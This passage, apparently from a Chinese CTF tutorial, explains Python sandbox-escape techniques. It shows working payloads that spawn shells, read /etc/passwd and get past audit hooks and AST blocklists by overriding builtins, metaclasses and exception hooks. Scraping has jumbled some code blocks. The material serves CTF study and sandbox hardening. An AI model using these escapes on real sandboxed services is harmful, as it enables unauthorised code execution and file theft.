但其 实尝试之后发现这个 payload 会报错,原因在于其中的某些 unicode 字符遇到 lower() 时会发生变化,避免 lower 产生干扰,可以在选取 unicode 时选择 ord 值更大的字符。例如 chr(4434)
当然,可以直接使用 input 函数来绕过长度限制。
打开 input 输入
如果沙箱内执行的内容是通过 input 进行传入的话(不是 web 传参),我们其实可以传入一个 input 打开一个新的输入流,然后再输入最终的 payload,这样就可以绕过所有的防护。
以 BYUCTF2023 jail a-z0-9 为例:
1 eval ((__import__ ("re" ).sub(r'[a-z0-9]' ,'' ,input ("code > " ).lower()))[:130 ])
即使限制了字母数字以及长度,我们可以直接传入下面的 payload(注意是 unicode)
这段 payload 打开 input 输入后,我们再输入最终的 payload 就可以正常执行。
1 __import__ ('os' ).system('whoami' )
打开输入流需要依赖 input 函数,no builtins 的环境中或者题目需要以 http 请求的方式进行输入时,这种方法就无法使用了。
sys.stdin.read() 注意输入完毕之后按 ctrl+d 结束输入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 >>> eval (sys.stdin.read())>>> __import__ ('os' ).system('whoami' )>>> root>>> 0 > >1 >2 >3 >4 >5 >sys.stdin.readline() >>> eval (sys.stdin.readline())>>> __import__ ('os' ).system('whoami' )>>> 1 >>> 2 >>> sys.stdin.readlines()>>> eval (sys.stdin.readlines()[0 ])>>> __import__ ('os' ).system('whoami' )>>> 1 >>> 2 >>> 在python 2 中,input 函数从标准输入接收输入之后会自动 eval 求值。因此无需在前面加上 eval 。但 raw_input 不会自动 eval 。
breakpoint 函数 pdb 模块定义了一个交互式源代码调试器,用于 Python 程序。它支持在源码行间设置(有条件的)断点和单步执行,检视堆栈帧,列出源码列表,以及在任何堆栈帧的上下文中运行任意 Python 代码。它还支持事后调试,可以在程序控制下调用。
在输入 breakpoint() 后可以代开 Pdb 代码调试器,在其中就可以执行任意 python 代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 𝘣𝘳𝘦𝘢𝘬𝘱𝘰𝘪𝘯𝘵() --Return-- <stdin>(1 )<module>()->None (Pdb) __import__ ('os' ).system('ls' ) a-z0-9. py exp2.py exp.py flag.txt 0 (Pdb) __import__ ('os' ).system('sh' ) $ ls a-z0-9. py exp2.py exp.py flag.txt 1 2 3 4 5 6 7 8 9
help 函数 help 函数可以打开帮助文档. 索引到 os 模块之后可以打开 sh
当我们输入 help 时,注意要进行 unicode 编码,help 函数会打开帮助(不编码也能打开)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 𝘩𝘦𝘭𝘱() 然后输入 os,此时会进入 os 的帮助文档。 help> os 然后再输入 !sh 就可以拿到 /bin/sh, 输入 !bash 则可以拿到 /bin/bash help> os $ ls a-z0-9.py exp2.py exp.py flag.txt
字符串叠加 参考[CISCN 2023 初赛]pyshell,通过_不断的进行字符串的叠加,再利用eval()进行一些命令的执行。
我们想执行的代码:import (“os”).popen(“tac flag”).read()
1 2 3 4 5 '__import__' _+'("os").p' _+'open("ta' _+'c flag")' _+'.read()'
变量覆盖与函数篡改 在 Python 中,sys 模块提供了许多与 Python 解释器和其环境交互的功能,包括对全局变量和函数的操作。在沙箱中获取 sys 模块就可以达到变量覆盖与函数擦篡改的目的.
sys.modules 存放了现有模块的引用, 通过访问 sys.modules[‘main ‘] 就可以访问当前模块定义的所有函数以及全局变量
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 >>> aaa = 'bbb' >>> def my_input(): >>> ... dict_global = dict() >>> ... while True: >>> ... try: >>> ... input_data = input("> ") >>> ... except EOFError: >>> ... print() >>> ... break >>> ... except KeyboardInterrupt: >>> ... print('bye~~') >>> ... continue >>> ... if input_data == '': >>> ... continue >>> ... try: >>> ... complie_code = compile(input_data, '<string>', 'single') >>> ... except SyntaxError as err: >>> ... print(err) >>> ... continue >>> ... try: >>> ... exec(complie_code, dict_global) >>> ... except Exception as err: >>> ... print(err) >>> ... >>> import sys >>> sys.modules['__main__'] >>> <module '__main__' (built-in)> >>> dir(sys.modules['__main__']) >>> ['__annotations__', '__builtins__', '__doc__', '__loader__', '__name__', '__package__', '__spec__', 'aaa', 'my_input', 'sys'] >>> sys.modules['__main__'].aaa >>> 'bbb'
除了通过 sys 模块来获取当前模块的变量以及函数外,还可以通过 __builtins__篡改内置函数等,这只是一个思路.
总体来说,只要获取了某个函数或者变量就可以篡改, 难点就在于获取.
利用 gc 获取已删除模块 这个思路来源于 writeup by fab1ano – github
这道题的目标是覆盖 main 中的 exit 函数,但是题目将 sys.modules[‘__main ‘] 删除了,无法直接获取.
1 2 3 for module in set (sys.modules.keys()): if module in sys.modules: del sys.modules[module]
gc 是Python的内置模块,全名为”garbage collector”,中文译为”垃圾回收”。gc 模块主要的功能是提供一个接口供开发者直接与 Python 的垃圾回收机制进行交互。
Python 使用了引用计数作为其主要的内存管理机制,同时也引入了循环垃圾回收器来检测并收集循环引用的对象。gc 模块提供了一些函数,让你可以直接控制这个循环垃圾回收器。
下面是一些 gc 模块中的主要函数:
gc.collect(generation=2):这个函数会立即触发一次垃圾回收。你可以通过 generation 参数指定要收集的代数。Python 的垃圾回收器是分代的,新创建的对象在第一代,经历过一次垃圾回收后仍然存活的对象会被移到下一代。
gc.get_referrers(*objs):这个函数会返回指向 objs 中任何一个对象的对象列表。
exp 如下
1 2 3 4 5 6 7 8 9 for obj in gc.get_objects(): if '__name__' in dir(obj): if '__main__' in obj.__name__: print('Found module __main__') mod_main = obj if 'os' == obj.__name__: print('Found module os') mod_os = obj mod_main.__exit = lambda x : print("[+] bypass")
在 3.11 版本和 python 3.8.10 版本中测试发现会触发 gc.get_objects hook 导致无法成功.
利用 traceback 获取模块
这个思路来源于 writeup by hstocks – github
主动抛出异常, 并获取其后要执行的代码, 然后将__exit__ 进行替换, 思路也是十分巧妙.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 try : raise Exception() except Exception as e: _, _, tb = sys.exc_info() nxt_frame = tb.tb_frame while nxt_frame: if 'audit' in nxt_frame.f_globals: break nxt_frame = nxt_frame.f_back nxt_frame.f_globals['__exit' ] = print os.system('cat /flag*' )
但是实际测试时使用 python 3.11 发现 nxt_frame = tb.tb_frame 会触发 object.getattr hook. 不同的版本中触发 hook 的地方会有差异,这个 payload 可能仅在 python 3.9 (题目版本)
绕过 audit hook Python 的审计事件包括一系列可能影响到 Python 程序运行安全性的重要操作。这些事件的种类及名称不同版本的 Python 解释器有所不同,且可能会随着 Python 解释器的更新而变动。
Python 中的审计事件包括但不限于以下几类:
PEP 578 – Python Runtime Audit Hooks
calc_jail_beginner_level6 这道题中使用了 audithook 构建沙箱,采用白名单来进行限制.audit hook 属于 python 底层的实现,因此常规的变换根本无法绕过.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 import sysdef my_audit_hook (my_event, _ ): WHITED_EVENTS = set ({'builtins.input' , 'builtins.input/result' , 'exec' , 'compile' }) if my_event not in WHITED_EVENTS: raise RuntimeError('Operation not permitted: {}' .format (my_event)) def my_input (): dict_global = dict () while True : try : input_data = input ("> " ) except EOFError: print () break except KeyboardInterrupt: print ('bye~~' ) continue if input_data == '' : continue try : complie_code = compile (input_data, '<string>' , 'single' ) except SyntaxError as err: print (err) continue try : exec (complie_code, dict_global) except Exception as err: print (err) def main (): WELCOME = ''' _ _ _ _ _ _ _ __ | | (_) (_) (_) | | | | | / / | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| |/ /_ | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ | '_ \ | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | (_) | |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_|\___/ __/ | _/ | |___/ |__/ ''' CODE = ''' dict_global = dict() while True: try: input_data = input("> ") except EOFError: print() break except KeyboardInterrupt: print('bye~~') continue if input_data == '': continue try: complie_code = compile(input_data, '<string>', 'single') except SyntaxError as err: print(err) continue try: exec(complie_code, dict_global) except Exception as err: print(err) ''' print (WELCOME) print ("Welcome to the python jail" ) print ("Let's have an beginner jail of calc" ) print ("Enter your expression and I will evaluate it for you." ) print ("White list of audit hook ===> builtins.input,builtins.input/result,exec,compile" ) print ("Some code of python jail:" ) print (CODE) my_input() if __name__ == "__main__" : sys.addaudithook(my_audit_hook) main()
绕过 import 导入模块. 如果直接使用 import,就会触发 audithook
1 2 3 4 __import__ ('ctypes' ) Operation not permitted: import 绕过常规的命令执行方法执行命令. 利用 os, subproccess 等模块执行命令时也会触发 audithook
本地调试时可以在 hook 函数中添加打印出 hook 的类型.
1 2 3 4 5 def my_audit_hook (my_event, _ ): print (f'[+] {my_event} , {_} ' ) WHITED_EVENTS = set ({'builtins.input' , 'builtins.input/result' , 'exec' , 'compile' }) if my_event not in WHITED_EVENTS: raise RuntimeError('Operation not permitted: {}' .format (my_event))
这样在测试 payload 时就可以知道触发了哪些 hook
1 2 3 4 import os[+] builtins.input /result, ('import os' ,) [+] compile , (b'import os' , '<string>' ) [+] exec , (<code object <module> at 0x7f966795bec0 , file "<string>" , line 1 >,)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 __loader__.load_module 导入模块 __loader__.load_module(fullname) 也是 python 中用于导入模块的一个方法并且不需要导入其他任何库. __loader__.load_module('os' ) __loader__ 实际上指向的是 _frozen_importlib.BuiltinImporter 类,也可以通过别的方式进行获取 >>> ().__class__.__base__.__subclasses__()[84 ]>>> <class '_frozen_importlib.BuiltinImporter' >>>> __loader__>>> <class '_frozen_importlib.BuiltinImporter' >>>> ().__class__.__base__.__subclasses__()[84 ].__name__>>> 'BuiltinImporter' >>> [x for x in ().__class__.__base__.__subclasses__() if 'BuiltinImporter' in x.__name__][0 ]>>> <class '_frozen_importlib.BuiltinImporter' >>>> 1 >>> 2 >>> 3 >>> 4 >>> 5 >>> 6 >>> 7 >>> 8 >>> __loader__.load_module 也有一个缺点就是无法导入非内建模块. 例如 socket>>> __loader__.load_module('socket' )>>> Traceback (most recent call last):>>> File "<stdin>" , line 1 , in <module>>>> File "<frozen importlib._bootstrap>" , line 290 , in _load_module_shim>>> File "<frozen importlib._bootstrap>" , line 721 , in _load>>> File "<frozen importlib._bootstrap>" , line 676 , in _load_unlocked>>> File "<frozen importlib._bootstrap>" , line 573 , in module_from_spec>>> File "<frozen importlib._bootstrap>" , line 776 , in create_module>>> ImportError: 'socket' is not a built-in module
_posixsubprocess 执行命令 _posixsubprocess 模块是 Python 的内部模块,提供了一个用于在 UNIX 平台上创建子进程的低级别接口。subprocess 模块的实现就用到了 _posixsubprocess.
该模块的核心功能是 fork_exec
提供了一个非常底层的方式来创建一个新的子进程,并在这个新进程中执行一个指定的程序。但这个模块并没有在 Python 的标准库文档中列出,每个版本的 Python 可能有所差异.
在我本地的 Python 3.11 中具体的函数声明如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 def fork_exec ( __process_args: Sequence [StrOrBytesPath] | None , __executable_list: Sequence [bytes ], __close_fds: bool , __fds_to_keep: tuple [int , ...], __cwd_obj: str , __env_list: Sequence [bytes ] | None , __p2cread: int , __p2cwrite: int , __c2pred: int , __c2pwrite: int , __errread: int , __errwrite: int , __errpipe_read: int , __errpipe_write: int , __restore_signals: int , __call_setsid: int , __pgid_to_set: int , __gid_object: SupportsIndex | None , __groups_list: list [int ] | None , __uid_object: SupportsIndex | None , __child_umask: int , __preexec_fn: Callable [[], None ], __allow_vfork: bool , ) -> int : ...__process_args: 传递给新进程的命令行参数,通常为程序路径及其参数的列表。 __executable_list: 可执行程序路径的列表。 __close_fds: 如果设置为True ,则在新进程中关闭所有的文件描述符。 __fds_to_keep: 一个元组,表示在新进程中需要保持打开的文件描述符的列表。 __cwd_obj: 新进程的工作目录。 __env_list: 环境变量列表,它是键和值的序列,例如:[“PATH=/usr/bin ”, “HOME=/home/user”]。 __p2cread, __p2cwrite, __c2pred, __c2pwrite, __errread, __errwrite: 这些是文件描述符,用于在父子进程间进行通信。 __errpipe_read, __errpipe_write: 这两个文件描述符用于父子进程间的错误通信。 __restore_signals: 如果设置为1 ,则在新创建的子进程中恢复默认的信号处理。 __call_setsid: 如果设置为1 ,则在新进程中创建新的会话。 __pgid_to_set: 设置新进程的进程组 ID。 __gid_object, __groups_list, __uid_object: 这些参数用于设置新进程的用户ID 和组 ID。 __child_umask: 设置新进程的 umask。 __preexec_fn: 在新进程中执行的函数,它会在新进程的主体部分执行之前调用。 __allow_vfork: 如果设置为True ,则在可能的情况下使用 vfork 而不是 fork。vfork 是一个更高效的 fork,但是使用 vfork 可能会有一些问题 。
1 2 3 4 import osimport _posixsubprocess_posixsubprocess.fork_exec([b"/bin/cat" ,"/etc/passwd" ], [b"/bin/cat" ], True , (), None , None , -1 , -1 , -1 , -1 , -1 , -1 , *(os.pipe()), False , False ,False , None , None , None , -1 , None , False )xxxxxxxxxx import osimport _posixsubprocess_posixsubprocess.fork_exec([b"/bin/cat" ,"/etc/passwd" ], [b"/bin/cat" ], True , (), None , None , -1 , -1 , -1 , -1 , -1 , -1 , *(os.pipe()), False , False ,False , None , None , None , -1 , None , False )1 2 3 4 import os import _posixsubprocess _posixsubprocess.fork_exec([b"/bin/cat" ,"/etc/passwd" ], [b"/bin/cat" ], True , (), None , None , -1 , -1 , -1 , -1 , -1 , -1 , *(os.pipe()), False , False ,False , None , None , None , -1 , None , False )
结合上面的 loader .load_module(fullname) 可以得到最终的 payload:
1 __loader__.load_module('_posixsubprocess' ).fork_exec([b"/bin/cat" ,"/etc/passwd" ], [b"/bin/cat" ], True , (), None , None , -1 , -1 , -1 , -1 , -1 , -1 , *(__loader__.load_module('os' ).pipe()), False , False ,False , None , None , None , -1 , None , False )
可以看到全程触发了 builtins.input/result
, compile
, exec
三个 hook, 这些 hook 的触发都是因为 input, compile, exec 函数而触发的, loader .load_module 和 _posixsubprocess 都没有触发.
1 2 3 [+] builtins.input /result, ('__loader__.load_module(\'_posixsubprocess\').fork_exec([b"/bin/cat","/flag"], [b"/bin/cat"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(__loader__.load_module(\'os\').pipe()), False, False,False, None, None, None, -1, None, False)' ,) [+] compile , (b'__loader__.load_module(\'_posixsubprocess\').fork_exec([b"/bin/cat","/flag"], [b"/bin/cat"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(__loader__.load_module(\'os\').pipe()), False, False,False, None, None, None, -1, None, False)' , '<string>' ) [+] exec , (<code object <module> at 0x7fbecc924670 , file "<string>" , line 1 >,)
另一种解法: 篡改内置函数
这道 audit hook 题还有另外一种解法.可以看到白名单是通过 set 函数返回的, set
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 WHITED_EVENTS = set ({'builtins.input' , 'builtins.input/result' , 'exec' , 'compile' }) 比如我们将 set 函数修改为固定返回一个包含了 os.system 函数的列表 __builtins__.set = lambda x: ['builtins.input' , 'builtins.input/result' ,'exec' , 'compile' , 'os.system' ] 1 这样 set 函数会固定返回带有 os.system 的列表. __builtins__.set = lambda x: ['builtins.input' , 'builtins.input/result' ,'exec' , 'compile' , 'os.system' ] 1 最终 payload: exec ("for k,v in enumerate(globals()['__builtins__']): print(k,v)" )
篡改函数 1 exec ("globals()['__builtins__']['set']=lambda x: ['builtins.input', 'builtins.input/result','exec', 'compile', 'os.system']\nimport os\nos.system('cat flag2.txt')" )
其他不触发 hook 的方式 1 2 3 4 5 6 7 8 9 10 11 12 13 使用 __loader__.load_module('os' ) 是为了获取 os 模块, 其实在 no builtins 利用手法中, 无需导入也可以获取对应模块. 例如: [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "wrapper" not in str (x.__init__) and "sys" in x.__init__.__globals__ ][0 ]["sys" ] [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if "'_sitebuiltins." in str (x) and not "_Helper" in str (x) ][0 ]["sys" ].modules["os" ] [ x.__init__.__globals__ for x in '' .__class__.__base__.__subclasses__() if x.__name__=="_wrap_close" ][0 ]["system" ]("ls" )
绕过 AST 沙箱 AST 沙箱会将用户的输入转化为操作码,此时字符串层面的变换基本上没用了,一般情况下考虑绕过 AST 黑名单. 例如下面的沙箱禁止了 ast.Import|ast.ImportFrom|ast.Call 这三类操作, 这样一来就无法导入模块和执行函数.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import astimport sysimport osdef verify_secure (m ): for x in ast.walk(m): match type (x): case (ast.Import|ast.ImportFrom|ast.Call): print (f"ERROR: Banned statement {x} " ) return False return True abspath = os.path.abspath(__file__) dname = os.path.dirname(abspath) os.chdir(dname) print ("-- Please enter code (last line must contain only --END)" )source_code = "" while True : line = sys.stdin.readline() if line.startswith("--END" ): break source_code += line tree = compile (source_code, "input.py" , 'exec' , flags=ast.PyCF_ONLY_AST) if verify_secure(tree): print ("-- Executing safe code:" ) compiled = compile (source_code, "input.py" , 'exec' ) exec (compiled)
下面的几种利用方式来源于 hacktricks
without call 如果基于 AST 的沙箱限制了执行函数,那么就需要找到一种不需要执行函数的方式执行系统命令.
利用 payload 如下:
1 2 3 4 @exec @input class X : pass
当我们输入上述的代码后, Python 会打开输入,此时我们再输入 payload 就可以成功执行命令.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 @exec @input class X : pass <class '__main__.X' >__import__ ("os" ).system("ls" ) 由于装饰器不会被解析为调用表达式或语句, 因此可以绕过黑名单, 最终传入的 payload 是由 input 接收的, 因此也不会被拦截. 其实这样的话,构造其实可以有很多,比如直接打开 help 函数. @help class X : pass 1 2 3 这样可以直接进入帮助文档: Help on class X in module __main__: class X (builtins.object ) | Data descriptors defined here: | | __dict__ | dictionary for instance variables (if defined) | | __weakref__ | list of weak references to the object (if defined) (END)xxxxxxxxxx Help on class X in module __main__:class X (builtins.object ) | Data descriptors defined here: | | __dict__ | dictionary for instance variables (if defined) | | __weakref__ | list of weak references to the object (if defined)(END)1 2 3 4 5 6 7 8 9 10 11 Help on class X in module __main__: class X (builtins.object ) | Data descriptors defined here: | | __dict__ | dictionary for instance variables (if defined) | | __weakref__ | list of weak references to the object (if defined) (END) 再次输入 !sh 即可打开 /bin /sh
函数覆盖 1 2 3 4 5 6 7 8 9 10 11 我们知道在 Python 中获取一个的属性例如 obj[argument] 实际上是调用的 obj.__getitem__ 方法.因此我们只需要覆盖其 __getitem__ 方法, 即可在使用 obj[argument] 执行代码: >>> class A :>>> ... __getitem__ = exec >>> ... >>> A()['__import__("os").system("ls")' ]>>> 1 >>> 2 >>> 3 >>> 4 >>> 但是这里调用了 A 的构造函数, 因此 AST 中还是会出现 ast.Call。
Python 中提供了一种元类(metaclass)概念。元类是创建类的“类”。在 Python中,类本身也是对象,元类就是创建这些类(即类的对象)的类。
元类在 Python 中的作用主要是用来创建类。类是对象的模板,而元类则是类的模板。元类定义了类的行为和属性,就像类定义了对象的行为和属性一样。
下面是基于元类的 payload, 在不使用构造函数的情况下触发
1 2 3 4 5 6 7 class Metaclass (type ): __getitem__ = exec class Sub (metaclass=Metaclass): pass Sub['import os; os.system("sh")' ]
除了 getitem 之外其他方法的利用方式如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 __sub__ (k - 'import os; os.system("sh")' ) __mul__ (k * 'import os; os.system("sh")' ) __floordiv__ (k // 'import os; os.system("sh")' ) __truediv__ (k / 'import os; os.system("sh")' ) __mod__ (k % 'import os; os.system("sh")' ) __pow__ (k**'import os; os.system("sh")' ) __lt__ (k < 'import os; os.system("sh")' ) __le__ (k <= 'import os; os.system("sh")' ) __eq__ (k == 'import os; os.system("sh")' ) __ne__ (k != 'import os; os.system("sh")' ) __ge__ (k >= 'import os; os.system("sh")' ) __gt__ (k > 'import os; os.system("sh")' ) __iadd__ (k += 'import os; os.system("sh")' ) __isub__ (k -= 'import os; os.system("sh")' ) __imul__ (k *= 'import os; os.system("sh")' ) __ifloordiv__ (k //= 'import os; os.system("sh")' ) __idiv__ (k /= 'import os; os.system("sh")' ) __itruediv__ (k /= 'import os; os.system("sh")' ) (Note that this only works when from __future__ import division is in effect.) __imod__ (k %= 'import os; os.system("sh")' ) __ipow__ (k **= 'import os; os.system("sh")' ) __ilshift__ (k<<= 'import os; os.system("sh")' ) __irshift__ (k >>= 'import os; os.system("sh")' ) __iand__ (k = 'import os; os.system("sh")' ) __ior__ (k |= 'import os; os.system("sh")' ) __ixor__ (k ^= 'import os; os.system("sh")' )
1 2 3 4 5 6 7 class Metaclass (type ): __sub__ = exec class Sub (metaclass=Metaclass): pass Sub-'import os; os.system("sh")'
exceptions 利用 利用 exceptions 的目的也是为了绕过显示地实例化一个类, 如果一个类继承了 Exception 类, 那么就可以通过 raise 关键字来实例化. payload 如下:
1 2 3 4 5 6 class RCE (Exception ): def __init__ (self ): self += 'import os; os.system("sh")' __iadd__ = exec raise RCE
raise 会进入 RCE 的 init , 然后触发 iadd 也就是 exec.
当然, 触发异常不一定需要 raise, 主动地编写错误代码也可以触发,与是就有了如下的几种 payload.
1 2 3 4 5 6 class X : def __init__ (self, a, b, c ): self += "os.system('sh')" __iadd__ = exec sys.excepthook = X 1 /0
这个 payload 中直接将 sys.excepthook 进行覆盖,任何异常产生时都会触发.
1 2 3 4 5 6 class X (): def __init__ (self, a, b, c, d, e ): self += "print(open('flag').read())" __iadd__ = eval __builtins__.__import__ = X
这个 payload 将 import 函数进行覆盖, 最后的 {}[1337] 在正常情况下会引发 KeyError 异常,因为 Python 在引发异常时会尝试导入某些模块(比如traceback 模块),导入时就会触发 import .
通过 license 函数读取文件 1 2 3 4 5 6 7 8 9 10 11 12 13 __builtins__.__dict__["license" ]._Printer__filenames=["/etc/passwd" ] a = __builtins__.help a.__class__.__enter__ = __builtins__.__dict__["license" ] a.__class__.__exit__ = lambda self , *args: None with (a as b): pass 上面的 payload 修改内建函数 license 的文件名列表为 /etc/passwd 当调用 license() 时会打印这个文件的内容. __builtins__.__dict__["license" ]._Printer__filenames ['/usr/lib/python3.11/../LICENSE.txt' , '/usr/lib/python3.11/../LICENSE' , '/usr/lib/python3.11/LICENSE.txt' , '/usr/lib/python3.11/LICENSE' , './LICENSE.txt' , './LICENSE' ] 1 2 payload 中将 help 类的 __enter__ 方法覆盖为 license 方法, 而 with 语句在创建上下文时会调用 help 的__enter__, 从而执行 license 方法. 这里的 help 类只是一个载体, 替换为其他的支持上下文的类或者自定义一个类也是可以的
1 2 3 4 5 6 7 8 9 class MyContext : pass __builtins__.__dict__["license" ]._Printer__filenames=["/etc/passwd" ] a = MyContext() a.__class__.__enter__ = __builtins__.__dict__["license" ] a.__class__.__exit__ = lambda self , *args: None with (a as b): pass
模拟 no builitins 环境 no builtins 环境和 python 交互式解析器还是有所差异, 但交互式解析器并没有提供指定命名空间的功能,因此可以自己编写一个脚本进行模拟:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 def repl (): global_namespace = {} local_namespace = {} while True : try : code = input ('>>> ' ) try : result = eval (code, global_namespace, local_namespace) except SyntaxError: exec (code, global_namespace, local_namespace) else : print (result) except EOFError: break except Exception as e: print (f"Error: {e} " ) if __name__ == "__main__" : repl()